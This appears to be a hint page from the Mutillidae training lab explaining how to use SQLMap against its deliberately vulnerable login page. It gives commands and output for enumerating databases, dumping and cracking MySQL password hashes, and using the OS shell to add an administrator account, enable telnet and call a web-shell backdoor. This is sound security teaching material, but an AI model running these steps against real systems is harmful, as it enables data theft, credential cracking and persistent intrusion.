Hints

SQL Injection with SQLMap

Overview

Note: See the SQL injection hint page for help specific to SQL injection. This page is dedicated to the tool SQLMap which can be helpful to evaluate the risk exposed by SQL injection vulnerabilities.

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. It is widely considered the best open-source SQL injection testing tool available.

Running SQLMAP Help

Note: On Kali Linux, SQLMap is found in /usr/share/sqlmap/

sqlmap --help Help
sqlmap -hh Double the help

Running SQLMAP "Manually"

sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner

Capturing Request To Pass To SQLMAP

Note: Save request to a file such as ~/engagements/sqlmap/login.php.request. The -r switch takes the file path.

URL: http://192.168.56.102/mutillidae/index.php?page=login.php

Request:
POST /mutillidae/index.php?page=login.php HTTP/1.1 Host: 192.168.56.102 User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.56.102/mutillidae/index.php?page=login.php Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4 Content-Type: application/x-www-form-urlencoded Content-Length: 57 username=asdf&password=asdf&login-php-submit-button=Login
Running SQLMAP with "auto-parse"

sqlmap -r ~/engagements/sqlmap/login.php.request <options>

Running SQLMAP with various features

sqlmap -r ~/engagements/sqlmap/login.php.request <options>
--banner web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: MySQL 5.0 banner: '5.5.25a' --fingerprint web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: active fingerprint: MySQL >= 5.5.0 --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA current user: 'root@localhost' current database: 'nowasp' current user is DBA: True hostname: 'mutillid-7se1xr' --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes database management system users [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'linux' [*] 'root'@'localhost' --dbs Enumerate DBMS databases available databases[10]: [*] cdcol [*] information_schema [*] mysql [*] nowasp [*] owasp10 [*] owasp13 [*] performance_schema [*] phpmyadmin [*] test [*] webauth

Enumerate DBMS database tables, columns, structure (schema)
--tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --exclude-sysdbs Exclude DBMS system databases when enumerating tables -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate

Extracting data

--dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell

Listing columns from tables

sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'" select column_name from information_schema.columns where table_name = 'user' [42]: [*] Alter_priv [*] Alter_routine_priv [*] authentication_string [*] Create_priv [*] Create_routine_priv [*] Create_tablespace_priv [*] Create_tmp_table_priv [*] Create_user_priv [*] Create_view_priv [*] Delete_priv [*] Drop_priv [*] Event_priv [*] Execute_priv [*] File_priv [*] Grant_priv [*] Host [*] Index_priv [*] Insert_priv [*] Lock_tables_priv [*] max_connections [*] max_questions [*] max_updates [*] max_user_connections [*] Password [*] plugin [*] Process_priv [*] References_priv [*] Reload_priv [*] Repl_client_priv [*] Repl_slave_priv [*] Select_priv [*] Show_db_priv [*] Show_view_priv [*] Shutdown_priv [*] ssl_cipher [*] ssl_type [*] Super_priv [*] Trigger_priv [*] Update_priv [*] User [*] x509_issuer [*] x509_subject

Advanced: Modifying injections

SELECT * FROM accounts WHERE username='' AND password=''' sqlmap -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string

Advanced: Dealing with inconsistent results

select User, Password from mysql.user versus sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc" select User, Password from mysql.user order by User desc select User, Password, Host, authentication_string from mysql.user order by User desc [9]: [*] root, , localhost, [*] root, , linux, [*] pma, , localhost, [*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost, [*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost, [*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost, [*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost, [*] , , localhost, [*] , , linux,

Cracking MySQL Password Hashes

John the Ripper Command Line /pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes Password Hashes in MySQL Format Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5 Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032 Patches:*2027D9391E714343187E07ACB41AE8925F30737E Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B

Understanding sqlmap O/S Shell

View transaction: tcpdump -i eth1 -vvv -X 1st Stage Uploader 2nd Stage Command Shell Page sc query state= all sc query tlntsvr sc config tlntsvr start= demand sc start tlntsvr net user root toor /add net localgroup TelnetClients /add net localgroup Administrators root /add net localgroup TelnetClients root /add netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101

Interacting Directly with sqlmap O/S Shell Backdoor

http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101

Direct connection to the database

Installing Py-MySQL Dependency git clone https://github.com/petehunt/PyMySQL/ cd PyMySQL python setup.py install cd .. rm -rf PyMySQL sqlmap -d mysql://root:""@192.168.56.102:5123/nowasp

Videos

Warning: Could not reach YouTube via network connection. Failed to embed video.

Automate SQL Injection using sqlmap: Visit YouTube Site
Warning: Could not reach YouTube via network connection. Failed to embed video.

Basics of SQL Injection Timing Attacks: Visit YouTube Site
Warning: Could not reach YouTube via network connection. Failed to embed video.

Introduction to Union-Based SQL Injection: Visit YouTube Site
Warning: Could not reach YouTube via network connection. Failed to embed video.

Basics of Inserting Data with SQL Injection: Visit YouTube Site
Warning: Could not reach YouTube via network connection. Failed to embed video.

Inject Web Shell Backdoor via SQL Injection: Visit YouTube Site
Warning: Could not reach YouTube via network connection. Failed to embed video.

Basics of using SQL Injection to Read Files: Visit YouTube Site
Warning: Could not reach YouTube via network connection. Failed to embed video.

Basics of using sqlmap - ISSA KY Workshop - February 2013: Visit YouTube Site
Warning: Could not reach YouTube via network connection. Failed to embed video.

Introduction to SQL Injection for Beginners: Visit YouTube Site
Warning: Could not reach YouTube via network connection. Failed to embed video.

Introduction to SQL Injection with SQLMap: Visit YouTube Site